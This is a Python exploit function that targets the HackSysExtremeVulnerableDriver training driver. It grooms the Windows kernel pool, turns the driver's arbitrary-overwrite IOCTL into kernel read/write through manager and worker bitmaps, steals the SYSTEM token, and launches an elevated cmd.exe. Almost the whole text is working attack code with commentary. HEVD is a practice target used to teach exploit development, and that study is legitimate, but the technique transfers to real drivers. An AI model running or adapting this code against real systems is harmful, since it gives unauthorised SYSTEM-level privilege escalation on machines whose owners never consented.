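def trigger_arbitrary_overwrite():
    """Main logic: turn HEVD's arbitrary overwrite into kernel R/W and steal SYSTEM's token.

    Steps, in order:
      1. Open the HackSysExtremeVulnerableDriver device.
      2. Groom the kernel pool (``alloc_free_accelerator_tables``) so that a
         "manager" and a "worker" bitmap each land in a predictable chunk, and
         record the address of each bitmap's pvScan0 pointer.
      3. Fire the ArbitraryOverwrite IOCTL exactly once, pointing the manager's
         pvScan0 at the worker's pvScan0.  After that ``read_virtual`` /
         ``write_virtual`` (presumably bitmap-bits helpers defined elsewhere in
         this file) give arbitrary kernel read/write.
      4. Copy the SYSTEM EPROCESS token pointer over the current process's.
      5. Spawn ``cmd.exe`` if the elevation took.

    Side effects: exits the process if the device cannot be opened or the
    IOCTL fails; launches ``cmd.exe`` on success.  Relies on module-level
    ``kernel32``, ``token_offset``, ``shell`` and the helper functions it calls.
    """
    # GENERIC_READ | GENERIC_WRITE, no sharing, OPEN_EXISTING.
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, None, 0x3, 0, None)
    # INVALID_HANDLE_VALUE is -1; a NULL handle is treated as failure as well.
    if not driver_handle or driver_handle == -1:
        print("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
        sys.exit()

    global hManager, hWorker

    # Where the pvScan0 pointer sits inside each groomed chunk (see debug output).
    pvscan0_field = 0x50

    # --- Manager bitmap --------------------------------------------------
    # Spray/free accelerator tables so the next bitmap allocation reuses a
    # freed chunk whose address we know.
    debug_print ("[>] Setting up Manager Bitmap:")
    debug_print ("\t[+] Allocating and Freeing AcceleratorTables")
    manager_chunk = alloc_free_accelerator_tables()
    setup_manager_bitmap()
    hManager_pvscan0_offset = manager_chunk + pvscan0_field
    debug_print ("\t[+] Manager Bitmap pvscan0 offset: 0x%X" % hManager_pvscan0_offset)

    # --- Worker bitmap ---------------------------------------------------
    debug_print ("\n[>] Setting up Worker Bitmap:")
    debug_print ("\t[+] Allocating and Freeing AcceleratorTables")
    worker_chunk = alloc_free_accelerator_tables()
    setup_worker_bitmap()
    hWorker_pvscan0_offset = worker_chunk + pvscan0_field
    debug_print ("\t[+] Worker Bitmap pvscan0 offset: 0x%X" % hWorker_pvscan0_offset)

    # --- Write-What-Where ------------------------------------------------
    # HEVD's handler reads *What and stores it at Where.  "What" must therefore
    # be the address of user memory holding the value to write (the worker
    # pvScan0 address), so write_what_ptr has to stay alive until the IOCTL
    # has returned.
    write_where = hManager_pvscan0_offset
    write_what_ptr = c_void_p(hWorker_pvscan0_offset)
    evil_input = struct.pack("<Q", addressof(write_what_ptr)) + struct.pack("<Q", write_where)
    # Use a real ctypes buffer rather than id(evil_input) + <offset>: the id()
    # trick depends on CPython's internal str/bytes object layout and silently
    # hands the driver the wrong address on a different interpreter build or
    # bitness.  The buffer must also outlive the call because METHOD_NEITHER
    # IOCTLs let the driver touch user memory directly.
    evil_buffer = ctypes.create_string_buffer(evil_input)
    evil_input_ptr = addressof(evil_buffer)
    evil_size = len(evil_input)
    debug_print ("\n[+] Triggering W-W-W to overwrite Manager pvscan0 value with Worker pvscan0 address")
    dwReturn = c_ulong()
    # 0x22200B == CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS),
    # the HEVD arbitrary-overwrite IOCTL.
    ioctl_ok = kernel32.DeviceIoControl(driver_handle, 0x22200B, evil_input_ptr, evil_size, None, 0, byref(dwReturn), None)
    if not ioctl_ok:
        # Do not touch kernel memory through a primitive that was never set
        # up: a stale pvScan0 read/write is a bugcheck, not a shell.
        print("[!] DeviceIoControl failed : Error " + str(ctypes.GetLastError()))
        sys.exit()
    # The device handle is only needed for the single overwrite.
    kernel32.CloseHandle(driver_handle)

    # --- Token theft -----------------------------------------------------
    system_EPROCESS = get_PsISP_kernel_address()
    debug_print ("\n[+] SYSTEM EPROCESS: 0x%X" % system_EPROCESS)
    current_EPROCESS = get_current_eprocess(system_EPROCESS)
    debug_print ("[+] current EPROCESS: 0x%X" % current_EPROCESS)

    # token_offset is the EPROCESS.Token offset; presumably set per target OS
    # build at module level -- confirm it matches the victim kernel.
    system_token = c_ulonglong()
    debug_print ("\r\n[+] Reading System TOKEN")
    read_virtual(system_EPROCESS + token_offset, byref(system_token), sizeof(system_token))
    debug_print ("[+] Writing System TOKEN")
    # NOTE(review): the 8-byte pointer is copied verbatim; nothing here bumps
    # the token's reference count, so process teardown may be unstable --
    # confirm on the target.
    write_virtual(current_EPROCESS + token_offset, byref(system_token), sizeof(system_token))

    if shell.IsUserAnAdmin():
        print("[*] Enjoy Elevated Privs !\r\n")
        os.system('cmd.exe')
    else:
        print("[-] Exploit did not work. Re-run it!")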